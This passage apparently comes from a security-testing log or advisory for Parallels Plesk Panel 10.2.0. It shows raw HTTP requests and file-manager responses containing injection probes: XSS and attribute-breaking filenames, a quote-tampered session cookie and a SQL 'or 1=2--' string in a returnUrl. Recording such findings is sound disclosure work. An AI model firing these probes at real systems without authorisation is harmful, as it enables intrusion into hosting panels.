&quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_6c91d8a7d6d" value="6c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=6c91d8a7d6d" onClick="return bin();;lon();">6c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/6c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=6c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F6c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=6c91d8a7d6d" 
onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_73dd0%2522%2520a%253db%25202d0878db96d" value="73dd0%2522%2520a%253db%25202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick="return bin();;lon();">73dd0%2522%2520a%253db%25202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/73dd0%2522%2520a%253db%25202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_7b286%2522%253e%253ca%253ef79f4c51d2e" value="7b286%2522%253e%253ca%253ef79f4c51d2e" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick="return bin();;lon();">7b286%2522%253e%253ca%253ef79f4c51d2e</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/7b286%2522%253e%253ca%253ef79f4c51d2e" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG 
src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return 
false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/edit/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

Request 2

GET /plesk/client@2/domain@1/hosting/file-manager/edit/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a''; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:33:53 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:33:54 GMT
Connection: close
Content-Length: 93562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fweb-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fanonymous-ftp%252F%2F%3F120933327%2520or%25201%253d2--%2520%3D1' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/";
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/";
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/";
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/edit/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
